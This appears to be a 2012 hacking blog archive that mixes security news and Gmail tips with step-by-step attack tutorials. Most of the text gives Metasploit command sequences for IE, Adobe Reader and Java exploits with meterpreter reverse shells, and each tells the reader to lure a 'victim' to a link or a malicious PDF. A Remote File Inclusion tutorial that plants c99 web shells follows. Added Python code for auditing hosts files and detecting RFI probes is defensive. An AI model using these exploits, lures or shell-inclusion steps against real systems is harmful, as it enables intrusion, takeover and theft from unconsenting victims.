Saturday, September 29, 2012

Suicide on Live TV: Fox News Suicide | Man Carjacked People, Shot at Cops Before Shooting Himself on Live TV

The man whose suicide was broadcast live across the country on Fox News this afternoon had stolen a car in Phoenix and shot at police officers this morning, according to Phoenix police.

Phoenix police Sergeant Tommy Thompson tells New Times that police have not figured out who this man is yet, but police were after him for quite some time.



Someone called police this morning, reporting that a man walking near 72nd Avenue and McDowell Road had hit a car, although it's not clear exactly what he did to that car.

While officers were responding to that, the man somehow managed to rob people of their car -- not the same vehicle he damaged.

Police spotted him shortly after he stole the car, and after chasing the man for a while, police dropped back into "surveillance," Thompson says. Undercover vehicles and helicopters were following him at this point.

Near 44th Avenue and Roosevelt, two officers -- one inside an undercover vehicle, the other standing outside a second undercover vehicle -- were parked off to the side of the road. Thompson says the man drove to the other side of the road and shot at the officers before driving his car onto Interstate 10.

At least one car was hit with a bullet, but the officers themselves were not hit.

By the time the man drove out to around 500th Avenue, he exited the interstate, drove south, and started heading back east.

Fox News anchor Shepard Smith had to apologize on-air Friday afternoon after Fox aired a suicide live on national television. Smith explained there was an error in the network's delay system, which should have given a five-second buffer between any inappropriate footage and the viewing public.

In those five seconds, producers should have been able to turn the feed off and prevent it from reaching viewers. Unfortunately, that delay failed just as a man involved in a high-speed police chase in Arizona shot himself in the head after exiting his vehicle. At the time the unidentified man shot himself, the camera was trained squarely on him and nothing was censored.

Fox News executive VP Michael Clemente issued the following statement to the news media:
We took every precaution to avoid any such live incident by putting the helicopter pictures on a five second delay. Unfortunately, this mistake was the result of a severe human error and we apologize for what viewers ultimately saw on the screen.


Revenge For Mohammed Film: Islamic Hacker Group Hacked Websites Of U.S. Banks


A hacker group based in the Middle East has flaunted its online muscle against several of America’s largest financial firms, temporarily keeping customers from accessing their information on banking websites and promising similar shutdowns again next week.

But while cyberattacks are routinely done to glean private account information, this threat appears different — it’s political.

The group — identifying itself as the Izz ad-Din al-Qassam Cyber Fighters — claimed responsibility in a post on Pastebin, a site used by hackers, according to The New York Times.

The group said the attacks are linked to the anti-Islam film that sparked deadly protests this month across the Muslim world.

“Insult to a prophet is not acceptable especially when it is the Last prophet Muhammad,” the post said. “So as we promised before, the attack will be continued until the removal of that sacrilegious movie from the Internet.”

Websites of JPMorgan Chase, Citigroup and Bank of America were affected last week, while Wells Fargo’s website was hit Tuesday, U.S. Bank was affected Wednesday and PNC Financial Services was disrupted Thursday.

New version of Blackhole has added more obfuscation technologies to frustrate security professionals


The first Blackhole exploit kit was bad, but version 2.0 is starting to look even nastier. 

Websense Inc. recently reported they had sent a Russian-speaking undercover researcher to feel around for information on any updates to the kit. What he found in the code looked suspiciously like a new, improved version of the hacking tool. 

And now, according to Chris Astacio, manager of security research at Websense, they’re confident that Blackhole 2.0 has indeed arrived and is now going to be harder to detect.

Astacio said his company found two significant upgrades to Blackhole. The first is code that allows users to create their own custom URLs, rather than having to use a standard one. This makes it harder to identify the kit.

The second is the addition of IP blocking capabilities. Hackers can now keep an IP blacklist of anyone visiting the URL hosting the binary, rather than simply the people visiting the landing page.

This means that security professionals can more effectively be stymied in their efforts to download the binaries and examine them, he said.

The creator or creators of the Blackhole kit seem remarkably keen on changing the methods of obscuring it, he added. This doesn’t happen “anywhere near as often for other kits,” said Astacio. For example, the obfuscation for the Phoenix exploit kit is changed every time a new version emerges, roughly three to six times a year, whereas with Blackhole, “we’ve seen as often as one to two times a month,” he said.

If you’re a hacker selling exploit kits, this is simply good business sense. It allows campaigns to run longer by keeping them out of reach of security pros longer, he added.

Astacio would not discuss specifics of how members of his team get access to the underground sites where the kits can be downloaded, though he did say that some of the “more rich communities” with obscure types of kits have extensive vetting processes.

An undercover researcher would have to engage in a bit of “asset gathering”: finding someone who can vouch for them and get them in the door. “After that, it’s just a matter of keeping your head down,” he said.

“Definitely you don’t want anybody within that forum to know that you’re a researcher, a security researcher at that,” Astacio said. If they do find out, retribution could come in the form of anything from simply kicking the person off the forum to “DDoSing their Web site that perhaps hosts a blog that releases information like this.”

But for the most part, researchers that do infiltrate these communities are protected well enough by the sheer number of people, hackers or not, viewing the site, Astacio said.

As for protecting yourself, as an Internet user, from constantly changing exploit kits like Blackhole, Astacio advises being vigilant about updating and patching your system.

“The most important thing that people can do to keep themselves safe from these kits is absolutely keep… all of their plugins up to date — so your PDM [portable document management] viewer, your Flash viewer, as well as Java, of course, being the most important one.”

“As long as you keep all your Web-based software up to date on your computer you should be fine.”

But sometimes, with threats like the recently discovered zero-day vulnerability in Java, that isn’t enough, he said. Those kinds of dangers can only be identified by security firms, like his own, which are constantly examining the content of malicious sites, he said.

SOURCE:  Canadian IT News

SCADA: Telvent's Corporate Network Hacked | China to blame?


SCADA software maker, Telvent Canada, Ltd, a subsidiary of Schneider-Electric, confirms that its corporate network was compromised and files used by customers were also accessed.

Telvent Canada (www.telvent.com), a provider of SCADA software and other real-time tools for the utility and oil and gas industries, revealed in a recent letter to customers that a recent intrusion into its network had been executed by a Chinese group called the Comment Group. Telvent Canada has contacted customers to warn them that a hacker or hackers breached its system, installed malware and stole files relating to OASyS SCADA. Brian Krebs, who made the story public, notes that this is an industrial control system designed for “smart grids” that track and respond to changes in demand.

Telvent itself says the system “ensures reliability by managing the distribution network and maintaining its operational integrity. It plays a central role in Smart Grid self-healing network architecture and improves overall grid safety and security.”

Telvent's parent company, Schneider Electric (www.schneider-electric.com), released a statement. Martin Hanna, a spokesman for Schneider Electric, said that the company had alerted customers to the attack and that there was no evidence the attackers ever had the ability to access customers' networks. "Telvent is aware of a security breach of its corporate network that has affected some customer files. Customers have been informed and are taking recommended actions, with the support of Telvent teams. Telvent is actively working with law enforcement, security specialists and its affected customers to ensure the breach has been contained," the statement said.

The recent attack coincided with the Telvent announcement of a partnership with Industrial Defender on Sept 12. Industrial Defender offers a product called Automation Systems Manager (ASM), which collects and analyzes data from software applications that provide a clear view of critical control applications.

Indian Naval Critical Data Transmitted to China


Every officer of the Indian Air Force (IAF) will now have to sign a declaration that they will not save or view any official document on personal computers. Failure to adhere to this directive will lead to a court-martial and prosecution.

The recent directive from the IAF headquarters to all its formations across the country comes after repeated leaks of sensitive documents, some of which are operational and sensitive in nature, from personal computers of officers and men.

In a recent case, operational documents were found on the personal computer of a young pilot posted at an airbase in Tamil Nadu. A court of inquiry has been initiated.

In another incident this July, it was found that classified data regarding Indian Naval operations was transmitted to IP addresses in China. Later, inquiries revealed that a few naval officers had, against the rules, taken copies of the plans on pen drives from a naval computer, to study. The Chinese-made pen drives allegedly carried malware which transmitted the data back to IP addresses in China once they were used on computers connected to the internet.

Earlier last year, a major with the Indian Army posted in the crucial Andaman and Nicobar Command was investigated by the Intelligence Bureau (IB) and the National Investigative Agency (NIA) when classified Army plans and other sensitive operational data stored in his personal computer reached Pakistan's Inter-Services Intelligence Agency (ISI). The inquiry revealed that the Major was preparing for a course, and had taken copies of presentations and plans in his personal computer, which was subsequently hacked by malware originating from Pakistan.

In almost every case of cyber leak, subsequent inquiries have revealed that officers wanting to study the documents at leisure copied the data from the official systems onto their personal computers, and the data later found its way into cyberspace.

Over the years, cyberspace has emerged as a critical frontier for espionage as the use of computers and dependence on the internet has grown. Thus, document security has emerged as one of the critical areas of concern for the government. Perhaps alluding to these increasing instances of cyberspace being used by foreign agencies to collect critical information, Prime Minister Manmohan Singh, while addressing top cops of the country at the annual security conference hosted by the Intelligence Bureau earlier this month, said, "Our country's vulnerability to cybercrime is escalating... Large-scale computer attacks on our critical infrastructure and economy can have potentially devastating results. The government is working on a robust cyber security structure."

The Indian armed forces are considering a joint cyber command to deal with document security and hackers, many of whom are funded and used by foreign governments searching for sensitive and strategic information. The Indian Navy has come up with an exclusive Information Technology brigade to be deployed on warships and various sensitive establishments on shore to manage and secure the network and data.

As a general rule, computers on which sensitive information is stored or prepared are never connected to the internet. "The IAF internal communication network, for instance, is not only a stand-alone network with no connection to the net, but also has the system configured in such a way that it doesn't allow external storage devices like pen drives or CDs," a senior MoD official told NDTV. Nonetheless, some officers have been found "keeping copies or preparing documents using critical information in their personal computers, which have subsequently passed out by malwares in the system or hacked," the officer added.

3 Best Gmail Tips: How to Use Custom Gmail Addresses | How to Use Gmail as a Hard Drive | How to access GMAIL without Internet

Use Custom Gmail Addresses

You can make up an unlimited number of arbitrary email addresses to use. You can use these addresses when making a purchase online, tracking a conversation, or anything else. You create these email addresses using plus-addressing.

Simply append a plus sign (+) and any string of letters or numbers (meaningful to you). For example, my mail ID is amarjitsingh1984@gmail.com. Now I can create as many custom addresses as I want. For all my online shopping, I am using amarjitsingh1984+shopping@gmail.com, and to follow any comment stream online I am using amarjitsingh1984+comments@gmail.com. I can further create subtags such as amarjitsingh1984+News+hacking@gmail.com & amarjitsingh+News+cricket@gmail.com.

The magic of these email addresses is that all plus-addressed email still arrives at my own mail ID, amarjitsingh1984@gmail.com. There I can use filters and labels in the Gmail inbox as per my convenience.

Some of my favorite uses of plus-addressing are:

· Informing my mates about a biking trip: I invite all of my Venturous Bikers Team using amarjitsingh1984+bikers@gmail.com and send myself a copy to keep track. Finalizing a trip takes around 20-30 days, so I can easily keep track of all the emails.

· Subscribing to newsletters: I subscribe to each newsletter using a unique mail ID. For example, I use amarjitsingh1984+quickonlinetips@gmail.com to subscribe to the www.quickonlinetips.com newsletter and amarjitsingh1984+hacking@gmail.com to subscribe to hacking sites' newsletters.

Use Gmail as a Hard Drive

GMail Drive (http://www.viksoe.dk/code/gmail.htm) provides 2+ gigabytes of storage allotted to your Gmail account right onto your desktop. It looks and feels just like a regular hard drive, and it’s not available locally of course. This drive is networked.

Open http://www.viksoe.dk/code/gmail.htm and in download section, you will see Gmail Drive. Download it and install.


Enter your Gmail username and password and click the OK button to log in. Your drive will be ready to use. Simply drag and drop the data and files to and fro between your local drive and GMail Drive.

NOTE: Mac OS X (10.3 or above) users should check out the freely available gDisk (http://gdisk.sourceforge.net) that adds a Gmail-powered drive to your desktop.

TIP: With GMail Drive, there is no need to stick with a pen drive or any other external drive. Go to your friend’s place, open GMail Drive and copy and paste the required data. Now come back to your system and open it. SO SIMPLE.

How to access GMAIL without Internet

Using this Gmail tool, you can access all your Gmail mail even when you are not connected to the internet. Just as we use Outlook for official purposes, you can use Gmail. All mail you send while offline will be placed in your outbox and sent automatically when you connect to the internet.

Once you turn on this feature, you need to download Gmail Gears on your system. As long as you stay connected to the internet, Gears will continuously synchronize the cache on the local system with the Gmail server.

Just follow these steps to get started:

· Click Settings and click the offline tab in your gmail inbox.

· Select Enable next to Offline Gmail.

· Click Save Changes.

· A pop-up window will open asking to install Gmail Gears on your system. Click Install.

· After your browser reloads, you'll see a new "Offline" link in green in the upper right corner of your account, next to your username. Click this link to start the offline setup process and download Gears if you don't already have it.




How to Hack Windows 7 using Metasploit

The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.

Requirement


metasploit

Windows 7

Open terminal type

msfconsole

use auxiliary/server/browser_autopwn

show options


Now set LHOST, PORT and URIPATH

Msf auxiliary(browser_autppwn) > set lhost 192.168.1.4 (The IP address of your computer )

Msf auxiliary(browser_autppwn) > set port 4444 (The default port of your Metasploit program)

Msf auxiliary(browser_autppwn) > set uripath /

Msf auxiliary(browser_autppwn) > exploit (to launch a exploit on targeted machine)

Send the link of the server to the victim via chat or email or any social engineering technique.

You now have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack windows 7 PC using MS11_003 Internet Explorer Exploit

This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.

Exploit Targets


0 – Automatic (default)

1 – Internet Explorer 8

2 – Internet Explorer 7

3 – Internet Explorer 6

4 – Debug Target (Crash)

Requirement


Attacker: metasploit

Victim PC: Windows 7

Open terminal type

msfconsole

use exploit/windows/browser/ms11_003_ie_css_import

Msf exploit (ms11_003_ie_css_import)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms11_003_ie_css_import)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (ms11_003_ie_css_import)>set srvport 80 (The local port to listen on default: 8080)

Msf exploit (ms11_003_ie_css_import)>set uripath newhackingvideos (The Url to use for this exploit)

Msf exploit (ms11_003_ie_css_import)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ms11_003_ie_css_import)>exploit


Now an URL you should give to your victim http://192.168.1.4/newhackingvideos.avi

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Remote XP using Heap Overflow Attack

This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation to be higher than what is available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we set up, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. Note: At this time, for the IE 8 target, you may choose either the JRE ROP or the msvcrt ROP to bypass DEP (Data Execution Prevention). Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Exploit Targets


Windows XP service pack 2

Windows XP service pack 3

Requirement



Attacker: metasploit

Victim PC: Windows XP

Open backtrack terminal type

msfconsole


Now type

use exploit/windows/browser/ms12_004_midi

Msf exploit (ms12_004_midi)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms12_004_midi)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ms12_004_midi)>set port 4444 (Port of Local PC)

Msf exploit (ms12_004_midi)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (ms12_004_midi)>set srvport 80 (The local port to listen on default: 8080)

Msf exploit (ms12_004_midi)>set uripath salesreport (The Url to use for this exploit)

Msf exploit (ms12_004_midi)>exploit


Now an URL you should give to your victim http://192.168.1.4/salesreport

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Windows XP using Shell Link Code Execution

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Requirement


Attacker:metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Msf exploit(ms10_046_shortcut_icon_dllloader)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms10_046_shortcut_icon_dllloader)>set lhost 192.168.1.6(IP of Local Host)

Msf exploit (ms10_046_shortcut_icon_dllloader)>set srvhost 192.168.1.6(This must be an address on the local machine)

Msf exploit (ms10_046_shortcut_icon_dllloader)>set uripath /(The Url to use for this exploit)

Msf exploit (ms10_046_shortcut_icon_dllloader)>exploit

Now an URL you should give to your victim http://192.168.1.6/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Remote PC with Operation Aurora Attack

Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.

The attack has been aimed at dozens of other organizations, of which Adobe Systems, Juniper Networks and Rackspace have publicly confirmed that they were targeted. According to media reports, Yahoo, Symantec, Northrop Grumman, Morgan Stanley and Dow Chemical were also among the targets.

Exploit Targets

Web Browser: Internet Explorer 5, Internet Explorer 6, Internet Explorer 7, Internet Explorer 8

Operating System: Windows Vista, Windows 7, Windows Server 2008

Requirement


Attacker:metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/browser/ms10_002_aurora

Msf exploit(ms10_002_aurora)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms10_002_aurora)>set lhost 192.168.1.4(IP of Local Host)

Msf exploit (ms10_002_aurora)>set srvhost 192.168.1.4(This must be an address on the local machine)

Msf exploit (ms10_002_aurora)>set uripathmeeting(The Url to use for this exploit)

Msf exploit (ms10_002_aurora)>exploit

Now an URL you should give to your victim http://192.168.1.4/meeting

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.

Exploit Targets

0 – Adobe Reader v9.0.0 (Windows XP SP3 English) (default)

1 – Adobe Reader v8.1.2 (Windows XP SP2 English)

Requirement


Attacker:metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/browser/adobe_jbig2decode

Msf exploit(adobe_jbig2decode)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_jbig2decode)>set lhost 192.168.1.4(IP of Local Host)

Msf exploit (adobe_jbig2decode)>set srvhost 192.168.1.4(This must be an address on the local machine)

Msf exploit (adobe_jbig2decode)>set uripathakonsong(The Url to use for this exploit)

Msf exploit (adobe_jbig2decode)>exploit

Now an URL you should give to your victimhttp://192.168.1.4:8080/akonsong
 
When the victim opens that link in their browser, immediately it will alert a dialog box about akonsong PDF .

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack remote PC using Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow

This module exploits a vulnerability in the Smart INdependent Glyphlets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well.

Exploit Targets

0 – Automatic (default)

Requirement

Victim PC: Windows XP

Open backtrack terminal type

msfconsole

use exploit/windows/browser/adobe_cooltype_sing

Msf exploit(adobe_cooltype_sing)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_cooltype_sing)>set lhost 192.168.1.3(IP of Local Host)

Msf exploit (adobe_cooltype_sing)>set srvhost 192.168.1.3(This must be an address on the local machine)

Msf exploit (adobe_cooltype_sing)>set uripathfinalreport(The Url to use for this exploit)

Msf exploit (adobe_cooltype_sing)>exploit

Now an URL you should give to your victim http://192.168.1.3/finalreport

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Remote PC using Sun Java Command Line Injection

Sun Java Web Start Plugin Command Line Argument Injection

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled.

Exploit Targets

0 – Automatic (default)

1 – Java Runtime on Windows x86

Requirement

Attacker: metasploit

Victim PC: Windows XP

Open backtrack terminal type

msfconsole

use exploit/windows/browser/java_ws_vmargs

Msf exploit(java_ws_vmargs)>set payload windows/meterpreter/reverse_tcp

Msf exploit (java_ws_vmargs)>set lhost 192.168.1.3(IP of Local Host)

Msf exploit (java_ws_vmargs)>set srvhost 192.168.1.3(This must be an address on the local machine)

Msf exploit (java_ws_vmargs)>set srvport 80

Msf exploit (java_ws_vmargs)>set uripath /(The Url to use for this exploit)

Msf exploit (java_ws_vmargs)>exploit

Now an URL you should give to your victim http://192.168.1.3/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

How to Hack Remote PC using pdf

Adobe FlateDecode Stream Predictor 02 Integer Overflow

This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.

Exploit Targets

0 – Adobe Reader Windows Universal (JS Heap Spray) (default)

Requirement

Attacker: metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/fileformat/adobe_flatedecode_predictor02

Msf exploit(adobe_flatedecode_predictor02)>set payload windows/meterpreter/reverse_tcp

Msf exploit(adobe_flatedecode_predictor02)>show options

Msf exploit (adobe_flatedecode_predictor02)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (adobe_flatedecode_predictor02)>set filename attack.pdf

Msf exploit (adobe_flatedecode_predictor02)>exploit

After we successfully generate the malicious PDF, it will stored on your local computer

/root/.msf4/local/attack.pdf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send yourattack.pdffiles to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

Redirect Site to Another Site


A simple text file edit makes a site redirect to another. When you type an address in the address bar of any browser and press Enter, a different web page is displayed. For example, when you type Google.com you will be redirected to yahoo.com.

Instructions:

1) Go to this directory [c:\windows\system32\drivers\etc]; the directory may change according to the drive used for the OS installation
2) Then hit Enter
3) Find a file named "hosts"
4) Right-click on it and open it with WordPad.
5) On the last line of the document, type the IP* address of yahoo, a space, then www.Google.com (vice versa for other sites)
6) Now save it
7) Restart the browser if it's already running
8) Now try it; it works perfectly

IP*: to find the IP address of that website, go to Start -> Run, type cmd and press Enter. A new window opens on the desktop. In it, type this without quotes: "ping www.yahoo.com". Replace yahoo.com with your preferred site and then press Enter.
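
Because the hosts file is consulted before DNS, the same edit made by malware or by another user silently redirects a site. The following added example (not part of the original post) audits a hosts file and reports every name pinned to an address; the sample file contents, the 203.0.113.10 documentation-range address and the ALLOWED_NAMES policy are constructed for illustration.

```python
"""Audit a hosts file for entries that override normal DNS resolution."""
import ipaddress

# Constructed sample: a hosts file after the kind of edit described above.
# 203.0.113.10 is a documentation-range placeholder, not any site's real address.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example.net      # local ad blocking
203.0.113.10    www.google.com google.com
10.0.0.5        intranet.corp.example
not-an-ip       broken.example
"""

# Hypothetical local policy: names that are expected to be pinned on this machine.
ALLOWED_NAMES = {"localhost", "intranet.corp.example"}


def parse_hosts(text):
    """Yield (line number, address text, [hostnames]) for each mapping line."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments and padding
        fields = line.split()
        if len(fields) < 2:                       # blank line or address with no name
            continue
        names = [name.lower().rstrip(".") for name in fields[1:]]
        yield lineno, fields[0], names


def audit_hosts(text, allowed=ALLOWED_NAMES):
    """Return a list of (line number, kind, address, name) findings.

    kind is "redirect" when a name is pinned to a routable or private address,
    "sinkhole" when it is pinned to loopback or 0.0.0.0 (usually blocking),
    and "malformed" when the first field is not an IP address.
    """
    findings = []
    for lineno, ip_text, names in parse_hosts(text):
        try:
            address = ipaddress.ip_address(ip_text)
        except ValueError:
            findings.append((lineno, "malformed", ip_text, " ".join(names)))
            continue
        for name in names:
            if name in allowed:
                continue
            if address.is_loopback or address.is_unspecified:
                kind = "sinkhole"
            else:
                kind = "redirect"
            findings.append((lineno, kind, ip_text, name))
    return findings


def redirected_names(text, allowed=ALLOWED_NAMES):
    """Map each redirected hostname to the address it has been pinned to."""
    return {name: ip for _, kind, ip, name in audit_hosts(text, allowed)
            if kind == "redirect"}


if __name__ == "__main__":
    # On a real system, read the file from the directory named in step 1 instead.
    for lineno, kind, ip, name in audit_hosts(SAMPLE_HOSTS):
        print(f"line {lineno}: {kind:9s} {name} -> {ip}")
```

Any "redirect" finding for a public site deserves a second look: compare the pinned address with what DNS returns for that name, and check who last modified the file.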

How to Do Remote File Inclusion?

Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website, which allows the hacker to execute server-side commands as the current logged-on user and have access to files on the server. With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system.

Many servers are vulnerable to this kind of attack because of PHP’s default settings of register_globals and allow_url_fopen being enabled. Although as of PHP 6.0, register_globals has been deprecated and removed, many websites still rely on older versions of PHP to run their web applications. Now let’s go through the steps a hacker would take to exploit this type of vulnerability in a website.


1. First the hacker would find a website that gets its pages via the PHP include() function and is vulnerable to RFI. Many hackers use Google dorks to locate servers vulnerable to RFI. A Google dork is the act of using Google’s provided search tools to help get a specific search result.

2. Websites that include pages have a navigation system similar to:
http://target-site.com/index.php?page=PageName

3. To see if the page is vulnerable, the hacker would try to include a site instead of PageName, like the following:
http://target-site.com/index.php?page=http://google.com

4. If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell.

5. A couple of the most popular shells are c99 and r57. A hacker would either upload them to a remote server or just use a Google dork to locate them already online and insert them. To find a shell the hacker would search Google for: inurl:c99.txt. This will display many websites with the shell already up and ready to be included. At the end of the URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems. The new URL with the shell included would look like:

http://target-site.com/index.php?page=http://site.com/c99.txt?

6. Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt.

7. In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be: allinurl:.php?page=. This looks for URLs with .php?page= in them. This is only an example and you most likely won’t find any vulnerable sites with that search. You can try switching around the word “page” with other letters and similar words. Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork.

8. If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen similar to the following:

The shell will display information about the remote server and list all the files and directories on it. From here the hacker would find a directory that has read and write privileges and upload the shell, but this time as a .php file so that in case the vulnerability is fixed, he will be able to access it later on.


9. The hacker would next find a way to gain root privileges on the system. He can do this by uploading and running local exploits against the server. He could also search the victim server for configuration files. These files may contain username and passwords for the MYSQL databases and such.

To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure your server's php.ini file has register_globals and allow_url_fopen disabled.
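The probe in steps 3 to 5 leaves a distinctive trace in the web server's access log: a query parameter whose value is itself a URL. The following is an added detection example, not code from the original post; the log lines, host names and the ALLOWED_URL_PARAMS exclusion list are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines in combined log format.
SAMPLE_LOG = [
    '198.51.100.23 - - [29/Sep/2012:10:01:02 +0000] "GET /index.php?page=contact HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.77 - - [29/Sep/2012:10:02:11 +0000] "GET /index.php?page=http://remote.example/file.txt? HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '198.51.100.77 - - [29/Sep/2012:10:02:40 +0000] "GET /index.php?page=hTTp%3A%2F%2Fremote.example%2Ffile.txt HTTP/1.1" 200 48211 "-" "-"',
    '198.51.100.80 - - [29/Sep/2012:10:03:05 +0000] "GET /index.php?page=http%253A%252F%252Fremote.example%252Ffile.txt HTTP/1.1" 404 310 "-" "-"',
    '198.51.100.9 - - [29/Sep/2012:10:04:00 +0000] "GET /out.php?url=http://partner.example/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [29/Sep/2012:10:04:30 +0000] "GET /search.php?q=what+is+http HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

# Hypothetical exclusions: (path, parameter) pairs that legitimately carry URLs.
ALLOWED_URL_PARAMS = {("/out.php", "url")}

REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+" (?P<status>\d{3}) '
)
REMOTE_SCHEME_RE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding, which is sometimes used to slip past filters."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(value):
    """Return the list of reasons a parameter value looks like an inclusion probe."""
    value = fully_decode(value)
    reasons = []
    if REMOTE_SCHEME_RE.match(value):
        reasons.append("remote-url")
        if value.rstrip().endswith("?"):
            reasons.append("trailing-question-mark")   # the trick from step 5
    if "\x00" in value:
        reasons.append("null-byte")                    # the trick from step 6
    return reasons


def scan(lines, allowed=ALLOWED_URL_PARAMS):
    """Return one dict per suspicious parameter found in the log lines."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if (parts.path, name) in allowed:
                continue
            reasons = classify_value(value)
            if reasons:
                hits.append({"client": m.group("client"), "path": parts.path,
                             "param": name, "status": int(m.group("status")),
                             "reasons": reasons})
    return hits


def suspicious_clients(hits):
    """Count hits per client address so repeat probers stand out."""
    return dict(Counter(h["client"] for h in hits))


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 deserves the first look, and the durable fix on the application side is to map the page parameter to a fixed list of local files. In PHP 5.2 and later, remote include() is additionally governed by allow_url_include, which is off by default.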

Friday, September 28, 2012

3 Best Tips before you do Google Searching again

